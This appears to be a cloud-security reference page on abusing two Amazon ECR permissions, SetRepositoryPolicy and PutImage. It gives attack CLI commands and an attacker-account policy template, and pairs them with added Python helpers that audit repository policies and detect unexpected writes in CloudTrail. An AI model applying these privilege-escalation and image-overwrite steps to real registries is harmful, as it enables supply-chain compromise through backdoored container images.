Elastic Container Registry (ECR)
Abusable Amazon ECR permissions that can lead to compromise or privilege escalation
ecr:SetRepositoryPolicy
With access to this permission, an attacker can create or modify a repository's resource-based policy, escalating their privileges by granting principals of their choosing access to the repository.
aws --region us-east-1 ecr set-repository-policy --repository-name tyler/my-private-repo --policy-text file://repo_policy.json
For the repository policy, the attacker could specify all AWS principals (any in the world):
"Principal": "*",
Or could specify the ARN of their own (attacker) account's root user, which in practice grants these permissions to any principal in the attacker's account:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowEveryone",
            "Effect": "Allow",
            "Principal": {
                "AWS": [
                    "arn:aws:iam::<attacker-aws-account-id>:root"
                ]
            },
            "Action": [
                "ecr:PutImage",
                "ecr:DescribeImages",
                "ecr:ListImages",
                "ecr:DescribeRepositories",
                "ecr:GetAuthorizationToken"
            ]
        }
    ]
}
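A defender reviewing repository policies wants to know which Allow statements reach principals outside the organisation's own accounts, and whether those statements carry write actions such as ecr:PutImage. The following audit helper is an added example written for this page (it is not part of the original page or of any AWS tooling); it evaluates a policy document of the shape shown above against a set of trusted account ids. The sample policy and the account ids 111111111111 and 222222222222 are constructed for the example, and the function names are my own.

```python
import json

# Constructed sample in the shape of the repository policy shown above; the
# attacker account id 222222222222 is made up for this example.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowEveryone",
            "Effect": "Allow",
            "Principal": {"AWS": ["arn:aws:iam::222222222222:root"]},
            "Action": [
                "ecr:PutImage", "ecr:DescribeImages", "ecr:ListImages",
                "ecr:DescribeRepositories", "ecr:GetAuthorizationToken",
            ],
        }
    ],
})

# Actions that let a principal change what the repository serves or who can reach it
# (compared case-insensitively, as IAM does).
WRITE_ACTIONS = {
    "ecr:putimage", "ecr:initiatelayerupload", "ecr:uploadlayerpart",
    "ecr:completelayerupload", "ecr:batchdeleteimage",
    "ecr:setrepositorypolicy", "ecr:deleterepositorypolicy",
    "ecr:putimagetagmutability", "ecr:*", "*",
}


def _as_list(value):
    """IAM accepts a scalar or a list in most policy fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _aws_principals(principal):
    """Yield the AWS principal strings from a Principal element in any of its forms."""
    if principal == "*":
        yield "*"
    elif isinstance(principal, dict):
        for value in _as_list(principal.get("AWS")):
            yield value


def account_of(principal):
    """Return the account id for an ARN or bare account id, or '*' for a wildcard."""
    if principal == "*":
        return "*"
    if principal.startswith("arn:"):
        parts = principal.split(":")
        return parts[4] if len(parts) > 4 else ""
    return principal


def find_risky_grants(policy_text, trusted_accounts):
    """Return Allow statements that grant access to a wildcard or an untrusted account."""
    policy = json.loads(policy_text)
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        grants_write = not actions.isdisjoint(WRITE_ACTIONS)
        for principal in _aws_principals(stmt.get("Principal")):
            account = account_of(principal)
            if account != "*" and account in trusted_accounts:
                continue
            findings.append({
                "sid": stmt.get("Sid", ""),
                "principal": principal,
                "account": account,
                "grants_write": grants_write,
                # A Condition (e.g. aws:PrincipalOrgID) may narrow a wildcard; review it by hand.
                "has_condition": "Condition" in stmt,
            })
    return findings


if __name__ == "__main__":
    for finding in find_risky_grants(SAMPLE_POLICY, trusted_accounts={"111111111111"}):
        print(finding)
```

In practice the policy text comes from aws ecr get-repository-policy --repository-name NAME --query policyText --output text for each repository. A finding with grants_write set is the case this page describes: an outside account that can push images. Findings with has_condition set still need a manual look, since a condition on a wildcard principal may legitimately restrict it to your organisation.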
ecr:PutImage
With access to this permission, an attacker could upload a compromised image, e.g. one containing a backdoor or one that sends data back to a command-and-control (C&C) server.
docker tag attacker-compromised-ubuntu:latest 111111111111.dkr.ecr.us-east-1.amazonaws.com/tyler/my-private-registry:ubuntu-latest
docker push 111111111111.dkr.ecr.us-east-1.amazonaws.com/tyler/my-private-registry:ubuntu-latest
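Both abuses on this page (rewriting a repository policy and pushing an image over an existing tag) are management-plane API calls that CloudTrail records in the registry owner's account, so they can be detected by comparing the calling principal against the small set of identities that are supposed to write to the registry. The rule below is an added example written for this page, not code from the original page or from AWS; the CloudTrail records are constructed samples that follow the field layout of real ECR events, and the account ids, ARNs, repository names and function names are all assumptions made for the example.

```python
# Constructed CloudTrail-style records; the field layout follows real ECR events
# but every value (accounts, ARNs, repository names) is made up for this example.
SAMPLE_EVENTS = [
    {   # expected: the CI role pushes to the repository
        "eventSource": "ecr.amazonaws.com", "eventName": "PutImage",
        "userIdentity": {"type": "AssumedRole", "accountId": "111111111111",
                         "arn": "arn:aws:sts::111111111111:assumed-role/ci-build-role/run-42"},
        "requestParameters": {"registryId": "111111111111",
                              "repositoryName": "tyler/my-private-registry",
                              "imageTag": "ubuntu-latest"},
    },
    {   # read-only call, outside the scope of this rule
        "eventSource": "ecr.amazonaws.com", "eventName": "DescribeRepositories",
        "userIdentity": {"type": "IAMUser", "accountId": "111111111111",
                         "arn": "arn:aws:iam::111111111111:user/contractor"},
        "requestParameters": {},
    },
    {   # a user outside the allowlist rewrites the repository policy
        "eventSource": "ecr.amazonaws.com", "eventName": "SetRepositoryPolicy",
        "userIdentity": {"type": "IAMUser", "accountId": "111111111111",
                         "arn": "arn:aws:iam::111111111111:user/contractor"},
        "requestParameters": {"registryId": "111111111111",
                              "repositoryName": "tyler/my-private-repo",
                              "policyText": "<policy json omitted in this sample>"},
    },
    {   # a principal from another account pushes over an existing tag
        "eventSource": "ecr.amazonaws.com", "eventName": "PutImage",
        "userIdentity": {"type": "IAMUser", "accountId": "222222222222",
                         "arn": "arn:aws:iam::222222222222:user/outsider"},
        "requestParameters": {"registryId": "111111111111",
                              "repositoryName": "tyler/my-private-registry",
                              "imageTag": "ubuntu-latest"},
    },
]

# ECR API calls that change repository contents, settings or access.
WATCHED_EVENTS = {
    "PutImage", "BatchDeleteImage", "SetRepositoryPolicy", "DeleteRepositoryPolicy",
    "PutImageTagMutability", "PutImageScanningConfiguration", "DeleteRepository",
}


def canonical_principal(arn):
    """Map an STS assumed-role session ARN to its IAM role ARN; leave other ARNs unchanged."""
    parts = arn.split(":", 5)
    if len(parts) == 6 and parts[2] == "sts" and parts[5].startswith("assumed-role/"):
        role_name = parts[5].split("/")[1]
        return "arn:aws:iam::%s:role/%s" % (parts[4], role_name)
    return arn


def detect_unexpected_ecr_writes(events, allowed_writers, registry_account):
    """Flag watched ECR calls whose caller is outside the allowlist or the registry's own account."""
    alerts = []
    for ev in events:
        if ev.get("eventSource") != "ecr.amazonaws.com":
            continue
        if ev.get("eventName") not in WATCHED_EVENTS:
            continue
        ident = ev.get("userIdentity", {})
        actor = canonical_principal(ident.get("arn", ""))
        reasons = []
        if ident.get("accountId") != registry_account:
            reasons.append("caller is outside the registry account")
        if actor not in allowed_writers:
            reasons.append("principal not in the write allowlist")
        if reasons:
            params = ev.get("requestParameters") or {}
            alerts.append({
                "eventName": ev["eventName"],
                "actor": actor,
                "repository": params.get("repositoryName", ""),
                "imageTag": params.get("imageTag", ""),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_unexpected_ecr_writes(
            SAMPLE_EVENTS,
            allowed_writers={"arn:aws:iam::111111111111:role/ci-build-role"},
            registry_account="111111111111"):
        print(alert)
```

The allowlist is keyed on the IAM role rather than the session ARN, because every CI run produces a different session name. As a preventive control for the tag overwrite shown above, setting the repository to immutable tags (aws ecr put-image-tag-mutability --repository-name NAME --image-tag-mutability IMMUTABLE) makes a push to an existing tag such as ubuntu-latest fail outright, so the detection only has to cover new tags and policy changes.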